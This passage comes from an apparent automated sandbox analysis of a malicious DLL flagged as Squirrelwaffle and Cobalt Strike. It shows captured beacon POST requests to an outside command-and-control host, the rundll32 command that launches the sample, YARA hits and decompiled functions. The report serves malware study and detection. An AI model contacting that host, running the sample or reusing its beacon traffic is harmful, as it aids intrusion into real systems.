                                          Sep 27, 2021 20:25:51.829639912 CEST1106OUTPOST /pcQLeLMbur/DClzfTsJDgA/AicrERgXCHsERX5yeGV9eXNkeWJ4 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:52.245923996 CEST1203INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:51 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 66 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+fkJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          8192.168.2.749765107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:52.541340113 CEST1336OUTPOST /pcQLeLMbur/EgwECwQhMhk+BQkuH38nHQUtIy4GLwpFfnJ4ZX15c2R5Yng= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:52.950078011 CEST1342INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:52 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 66 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+fkJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          9192.168.2.749768107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:53.427154064 CEST1347OUTPOST /pcQLeLMbur/GB0tLyckQ3p1fWV7fXRheWR8 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:53.840007067 CEST1355INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:53 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 2b 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt+f0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: loaddll32.exe PID: 6620 Parent PID: 672

                                          General

                                          Start time:20:25:42
                                          Start date:27/09/2021
                                          Path:C:\Windows\System32\loaddll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll'
                                          Imagebase:0x8d0000
                                          File size:116736 bytes
                                          MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86, Description: Detects CobaltStrike payloads, Source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, Author: Avast Threat Intel Team
                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86, Description: Detects CobaltStrike payloads, Source: 00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmp, Author: Avast Threat Intel Team
                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.516568277.00000000009F0000.00000004.00000020.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Squirrelwaffle, Description: Yara detected Squirrelwaffle, Source: 00000000.00000002.515938362.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, Author: FireEye
                                          • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, Author: yara@s3c.za.net
                                          • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, Author: Florian Roth
                                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.519373295.0000000003B20000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, Author: FireEye
                                          • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, Author: yara@s3c.za.net
                                          • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, Author: Florian Roth
                                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 6644 Parent PID: 6620

                                          General

                                          Start time:20:25:43
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                                          Imagebase:0x870000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: rundll32.exe PID: 6688 Parent PID: 6644

                                          General

                                          Start time:20:25:44
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\p2SijKiqgZ.dll',#1
                                          Imagebase:0x1010000
                                          File size:61952 bytes
                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Squirrelwaffle, Description: Yara detected Squirrelwaffle, Source: 00000003.00000000.254857742.0000000004590000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Squirrelwaffle, Description: Yara detected Squirrelwaffle, Source: 00000003.00000000.253813077.0000000004590000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Squirrelwaffle, Description: Yara detected Squirrelwaffle, Source: 00000003.00000002.284559646.0000000004590000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: WerFault.exe PID: 6844 Parent PID: 6688

                                          General

                                          Start time:20:25:48
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 732
                                          Imagebase:0xfe0000
                                          File size:434592 bytes
                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Analysis Process: loaddll32.exe PID: 6620 Parent PID: 672 loaddll32.exeCOMMON

                                            Executed Functions

                                            Function 03B298C1, Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNEL32(00000000,00000000,00000020,00000004,00000000), ref: 03B298EB
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, Offset: 03B21000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: c8269323ef5a83853f531880be9aa38fe7d1b7683f8a152e64d76accc3a7c159
                                            • Instruction ID: a8caf8d90d494b0285286b9c238a300420996b4362e3bbd67b52e0a78d4bf761
                                            • Opcode Fuzzy Hash: c8269323ef5a83853f531880be9aa38fe7d1b7683f8a152e64d76accc3a7c159
                                            • Instruction Fuzzy Hash: CDE01A3150021CABDB18CE44DC54BAA77A8EF44759F0882AAFD1C4A180E771EA64CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 03B297D1, Relevance: 1.3, APIs: 1, Instructions: 83memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,?,AAAABBBB), ref: 03B298A9
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, Offset: 03B21000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: ab1574bfb117445310e7799441a9603d0f3f20793018a174e19dd5860c254bed
                                            • Instruction ID: 4e98edc9a085e79b6b580fd6ec61e4074d486f00824cbf1691a784b7b4cfbf66
                                            • Opcode Fuzzy Hash: ab1574bfb117445310e7799441a9603d0f3f20793018a174e19dd5860c254bed
                                            • Instruction Fuzzy Hash: 4D31DE71A10109AFDB08CF99C894BAEB7B5FF88354F04C2A9E91D9B294D770E950CF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 03B29BA1, Relevance: .2, Instructions: 182COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.263743260.0000000003B21000.00000040.00000001.sdmp, Offset: 03B21000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
                                            • Instruction ID: f2308c1492a2fac97a4eb6aea6fe7c87ea136ef63ec1c525f59a210ae9fbdb7a
                                            • Opcode Fuzzy Hash: 66815fa4e515433c11deb6288a89f5de42c04bc31794f64a68d3cfb98a76f997
                                            • Instruction Fuzzy Hash: 1891C374E0521ACFCF08CF98C5909AEBBB1FF48309F2486A9D91967355D330AA91DF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: rundll32.exe PID: 6688 Parent PID: 6644 rundll32.exeCOMMON

                                            Executed Functions

                                            Function 009454B4, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 66%
                                            			E009454B4(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x9455b9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E009452FC( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00945720, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E009455C0);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L009412D4();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L009412DC();
								_t94 = _t70 +  &_v289;
								L12:
								if( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
									goto L12;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L009412D4();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L009412D4();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L009412D4();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                            0x009454b5
                                            0x009454b7
                                            0x009454bf
                                            0x009454d0
                                            0x009454d5
                                            0x009454ee
                                            0x009454f5
                                            0x00945537
                                            0x00945539
                                            0x0094553a
                                            0x0094553f
                                            0x00945542
                                            0x00945545
                                            0x00945557
                                            0x0094557a
                                            0x0094559a
                                            0x0094559a
                                            0x0094559e
                                            0x009455a4
                                            0x009455a7
                                            0x009455aa
                                            0x009455b8
                                            0x009454f7
                                            0x0094550c
                                            0x00945513
                                            0x00000000
                                            0x00945515
                                            0x0094552a
                                            0x00945531
                                            0x009455c0
                                            0x009455c8
                                            0x009455cf
                                            0x009455d0
                                            0x009455e3
                                            0x009455e8
                                            0x009455f1
                                            0x00945607
                                            0x0094560d
                                            0x0094560e
                                            0x0094561b
                                            0x00945620
                                            0x00945623
                                            0x0094561f
                                            0x00000000
                                            0x0094561f
                                            0x0094562f
                                            0x00945637
                                            0x0094563d
                                            0x00945642
                                            0x0094564f
                                            0x00945653
                                            0x00945654
                                            0x00945655
                                            0x0094566a
                                            0x0094566a
                                            0x0094566e
                                            0x00945687
                                            0x0094568b
                                            0x0094568c
                                            0x0094568d
                                            0x0094569d
                                            0x009456a2
                                            0x009456a6
                                            0x009456a8
                                            0x009456bd
                                            0x009456c1
                                            0x009456c2
                                            0x009456c3
                                            0x009456d3
                                            0x009456d8
                                            0x009456d8
                                            0x009456a6
                                            0x0094566e
                                            0x00945637
                                            0x009456e1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00945531
                                            0x00945513

                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,108B0099,0099A0A4), ref: 009454D0
                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,108B0099,0099A0A4), ref: 009454EE
                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,108B0099,0099A0A4), ref: 0094550C
                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0094552A
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,009455B9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00945573
                                            • RegQueryValueExA.ADVAPI32(?,00945720,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,009455B9,?,80000001), ref: 00945591
                                            • RegCloseKey.ADVAPI32(?,009455C0,00000000,?,?,00000000,009455B9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 009455B3
                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 009455D0
                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 009455DD
                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 009455E3
                                            • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0094560E
                                            • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00945655
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00945665
                                            • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0094568D
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0094569D
                                            • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 009456C3
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 009456D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                            • API String ID: 1759228003-2375825460
                                            • Opcode ID: abd951cffb62fc400fa6e98db58c8fe63ac8a099fcbe0d13a93e30514a39b432
                                            • Instruction ID: d93f86d13dccf2a4a479e32838890706f4792857489e2598b6c9093c4b38d357
                                            • Opcode Fuzzy Hash: abd951cffb62fc400fa6e98db58c8fe63ac8a099fcbe0d13a93e30514a39b432
                                            • Instruction Fuzzy Hash: E6516371A5065C7FEB21D6E4DC46FEFB7BC9B44744F4200A1BA04E61C2EAB49E84CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 009455C0, Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 61%
                                            			E009455C0() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L009412D4();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L009412DC();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L009412D4();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L009412D4();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L009412D4();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                            0x009455c0
                                            0x009455c8
                                            0x009455cf
                                            0x009455d0
                                            0x009455e3
                                            0x009455e8
                                            0x009455f1
                                            0x009456da
                                            0x009456e1
                                            0x00945607
                                            0x00945607
                                            0x0094560d
                                            0x0094560e
                                            0x0094561b
                                            0x00945620
                                            0x00945623
                                            0x0094561f
                                            0x00000000
                                            0x0094561f
                                            0x0094562f
                                            0x00945637
                                            0x0094563d
                                            0x00945642
                                            0x0094564f
                                            0x00945653
                                            0x00945654
                                            0x00945655
                                            0x0094566a
                                            0x0094566a
                                            0x0094566e
                                            0x00945687
                                            0x0094568b
                                            0x0094568c
                                            0x0094568d
                                            0x0094569d
                                            0x009456a2
                                            0x009456a6
                                            0x009456a8
                                            0x009456bd
                                            0x009456c1
                                            0x009456c2
                                            0x009456c3
                                            0x009456d3
                                            0x009456d8
                                            0x009456d8
                                            0x009456a6
                                            0x0094566e
                                            0x00000000
                                            0x00945637

                                            APIs
                                            • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 009455D0
